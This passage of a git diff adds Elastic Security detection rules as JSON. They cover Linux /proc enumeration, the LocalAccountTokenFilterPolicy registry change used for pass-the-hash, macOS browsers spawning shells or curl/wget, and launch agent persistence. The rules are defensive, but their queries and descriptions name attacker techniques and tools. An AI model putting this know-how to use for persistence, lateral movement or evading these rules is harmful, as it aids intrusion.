exe files, which suggests an abnormal activity pattern. Such behavior could be an indicator of a malicious process scanning or gathering information about running processes, potentially for reconnaissance, privilege escalation, or identifying vulnerable targets.", + "from": "now-119m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious Proc Pseudo File System Enumeration", + "query": "host.os.type:linux and event.category:file and event.action:\"opened-file\" and \nfile.path : (/proc/*/cmdline or /proc/*/stat or /proc/*/exe) and not process.name : (\n ps or netstat or landscape-sysin or w or pgrep or pidof or needrestart or apparmor_status\n) and not process.parent.pid : 1\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + } + ], + "risk_score": 21, + "rule_id": "0787daa6-f8c5-453b-a4ec-048037f6c1cd", + "setup": "\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "severity": "low", + "tags": [ + "Data Source: Auditd Manager", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + }, + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "threshold": { + "cardinality": [ + { + "field": "file.path", + "value": 100 + } + ], + "field": [ + "host.id", + "process.pid", + "process.name" + ], + "value": 1 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 6 + }, + "id": "0787daa6-f8c5-453b-a4ec-048037f6c1cd_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_7.json b/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_7.json new file mode 100644 index 00000000000..69fa83c01d3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_7.json @@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "This rule monitors for a rapid enumeration of 25 different proc cmd, stat, and exe files, which suggests an abnormal activity pattern. Such behavior could be an indicator of a malicious process scanning or gathering information about running processes, potentially for reconnaissance, privilege escalation, or identifying vulnerable targets.", + "from": "now-119m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious Proc Pseudo File System Enumeration", + "query": "host.os.type:linux and event.category:file and event.action:\"opened-file\" and \nfile.path : (/proc/*/cmdline or /proc/*/stat or /proc/*/exe) and not process.name : (\n ps or netstat or landscape-sysin or w or pgrep or pidof or needrestart or apparmor_status\n) and not process.parent.pid : 1\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + } + ], + "risk_score": 21, + "rule_id": "0787daa6-f8c5-453b-a4ec-048037f6c1cd", + "setup": "## Setup\n\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "severity": "low", + "tags": [ + "Data Source: Auditd Manager", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + }, + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "threshold": { + "cardinality": [ + { + "field": "file.path", + "value": 100 + } + ], + "field": [ + "host.id", + "process.pid", + "process.name" + ], + "value": 1 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 7 + }, + "id": "0787daa6-f8c5-453b-a4ec-048037f6c1cd_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_7.json b/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_7.json new file mode 100644 index 00000000000..af9e47a9fea --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_7.json @@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies registry modification to the LocalAccountTokenFilterPolicy policy. If this value exists (which doesn't by default) and is set to 1, then remote connections from all local members of Administrators are granted full high-integrity tokens during negotiation.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Local Account TokenFilter Policy Disabled", + "query": "registry where host.os.type == \"windows\" and registry.path : (\n \"HKLM\\\\*\\\\LocalAccountTokenFilterPolicy\",\n \"\\\\REGISTRY\\\\MACHINE\\\\*\\\\LocalAccountTokenFilterPolicy\") and\n registry.data.strings : (\"1\", \"0x00000001\")\n", + "references": [ + "https://www.stigviewer.com/stig/windows_server_2008_r2_member_server/2014-04-02/finding/V-36439", + "https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167", + "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "07b1ef73-1fde-4a49-a34a-5dd40011b076", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + }, + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1550", + "name": "Use Alternate Authentication Material", + "reference": "https://attack.mitre.org/techniques/T1550/", + "subtechnique": [ + { + "id": "T1550.002", + "name": "Pass the Hash", + "reference": "https://attack.mitre.org/techniques/T1550/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "07b1ef73-1fde-4a49-a34a-5dd40011b076_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_8.json b/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_8.json new file mode 100644 index 00000000000..8fd8fb2eceb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_8.json @@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies registry modification to the LocalAccountTokenFilterPolicy policy. If this value exists (which doesn't by default) and is set to 1, then remote connections from all local members of Administrators are granted full high-integrity tokens during negotiation.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Local Account TokenFilter Policy Disabled", + "query": "registry where host.os.type == \"windows\" and registry.path : (\n \"HKLM\\\\*\\\\LocalAccountTokenFilterPolicy\",\n \"\\\\REGISTRY\\\\MACHINE\\\\*\\\\LocalAccountTokenFilterPolicy\") and\n registry.data.strings : (\"1\", \"0x00000001\")\n", + "references": [ + "https://www.stigviewer.com/stig/windows_server_2008_r2_member_server/2014-04-02/finding/V-36439", + "https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167", + "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "07b1ef73-1fde-4a49-a34a-5dd40011b076", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + }, + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1550", + "name": "Use Alternate Authentication Material", + "reference": "https://attack.mitre.org/techniques/T1550/", + "subtechnique": [ + { + "id": "T1550.002", + "name": "Pass the Hash", + "reference": "https://attack.mitre.org/techniques/T1550/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 8 + }, + "id": "07b1ef73-1fde-4a49-a34a-5dd40011b076_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_106.json b/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_106.json new file mode 100644 index 00000000000..47d1d60d0d2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_106.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a suspicious browser child process. Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Browser Child Process", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.parent.name : (\"Google Chrome\", \"Google Chrome Helper*\", \"firefox\", \"Opera\", \"Safari\", \"com.apple.WebKit.WebContent\", \"Microsoft Edge\") and\n process.name : (\"sh\", \"bash\", \"dash\", \"ksh\", \"tcsh\", \"zsh\", \"curl\", \"wget\", \"python*\", \"perl*\", \"php*\", \"osascript\", \"pwsh\") and\n process.command_line != null and\n not process.command_line : \"*/Library/Application Support/Microsoft/MAU*/Microsoft AutoUpdate.app/Contents/MacOS/msupdate*\" and\n not process.args :\n (\n \"hw.model\",\n \"IOPlatformExpertDevice\",\n \"/Volumes/Google Chrome/Google Chrome.app/Contents/Frameworks/*/Resources/install.sh\",\n \"--defaults-torrc\",\n \"*Chrome.app\",\n \"Framework.framework/Versions/*/Resources/keystone_promote_preflight.sh\",\n \"/Users/*/Library/Application Support/Google/Chrome/recovery/*/ChromeRecovery\",\n \"$DISPLAY\",\n \"*GIO_LAUNCHED_DESKTOP_FILE_PID=$$*\",\n \"/opt/homebrew/*\",\n \"/usr/local/*brew*\"\n )\n", + "references": [ + "https://objective-see.com/blog/blog_0x43.html", + "https://fr.slideshare.net/codeblue_jp/cb19-recent-apt-attack-on-crypto-exchange-employees-by-heungsoo-kang" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "080bc66a-5d56-4d1f-8071-817671716db9", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1203", + "name": "Exploitation for Client Execution", + "reference": "https://attack.mitre.org/techniques/T1203/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1189", + "name": "Drive-by Compromise", + "reference": "https://attack.mitre.org/techniques/T1189/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "080bc66a-5d56-4d1f-8071-817671716db9_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_106.json b/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_106.json new file mode 100644 index 00000000000..9e99be15b80 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_106.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An adversary can establish persistence by installing a new launch agent that executes at login by using launchd or launchctl to load a plist into the appropriate directories.", + "false_positives": [ + "Trusted applications persisting via LaunchAgent" + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Launch Agent Creation or Modification and Immediate Loading", + "query": "sequence by host.id with maxspan=1m\n [file where host.os.type == \"macos\" and event.type != \"deletion\" and\n file.path : (\"/System/Library/LaunchAgents/*\", \"/Library/LaunchAgents/*\", \"/Users/*/Library/LaunchAgents/*\")\n ]\n [process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and process.name == \"launchctl\" and process.args == \"load\"]\n", + "references": [ + "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "082e3f8c-6f80-485c-91eb-5b112cb79b28", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.001", + "name": "Launch Agent", + "reference": "https://attack.mitre.org/techniques/T1543/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "082e3f8c-6f80-485c-91eb-5b112cb79b28_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_106.json b/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_106.json new file mode 100644 index 00000000000..a1f97e57e54 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_106.json @@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a launchd child process with a hidden file. An adversary can establish persistence by installing a new logon item, launch agent, or daemon that executes upon login.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious Hidden Child Process of Launchd", + "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and\n process.name:.* and process.parent.executable:/sbin/launchd\n", + "references": [ + "https://objective-see.com/blog/blog_0x61.html", + "https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/", + "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "083fa162-e790-4d85-9aeb-4fea04188adb", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.001", + "name": "Launch Agent", + "reference": "https://attack.mitre.org/techniques/T1543/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/", + "subtechnique": [ + { + "id": "T1564.001", + "name": "Hidden Files and Directories", + "reference": "https://attack.mitre.org/techniques/T1564/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "083fa162-e790-4d85-9aeb-4fea04188adb_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0859355c-0f08-4b43-8ff5-7d2a4789fc08_3.json b/packages/security_detection_engine/kibana/security_rule/0859355c-0f08-4b43-8ff5-7d2a4789fc08_3.json new file mode 100644 index 00000000000..33219c25d69 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0859355c-0f08-4b43-8ff5-7d2a4789fc08_3.json @@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies newly seen removable devices by device friendly name using registry modification events. While this activity is not inherently malicious, analysts can use those events to aid monitoring for data exfiltration over those devices.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "First Time Seen Removable Device", + "new_terms_fields": [ + "registry.path" + ], + "query": "event.category:\"registry\" and host.os.type:\"windows\" and registry.value:\"FriendlyName\" and registry.path:*USBSTOR*\n", + "references": [ + "https://winreg-kb.readthedocs.io/en/latest/sources/system-keys/USB-storage.html", + "https://learn.microsoft.com/en-us/windows-hardware/drivers/usbcon/usb-device-specific-registry-settings" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0859355c-0f08-4b43-8ff5-7d2a4789fc08", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Exfiltration", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1091", + "name": "Replication Through Removable Media", + "reference": "https://attack.mitre.org/techniques/T1091/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1052", + "name": "Exfiltration Over Physical Medium", + "reference": "https://attack.mitre.org/techniques/T1052/", + "subtechnique": [ + { + "id": "T1052.001", + "name": "Exfiltration over USB", + "reference": "https://attack.mitre.org/techniques/T1052/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 3 + }, + "id": "0859355c-0f08-4b43-8ff5-7d2a4789fc08_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0859355c-0f08-4b43-8ff5-7d2a4789fc08_4.json b/packages/security_detection_engine/kibana/security_rule/0859355c-0f08-4b43-8ff5-7d2a4789fc08_4.json new file mode 100644 index 00000000000..280e5439712 --- /dev/null 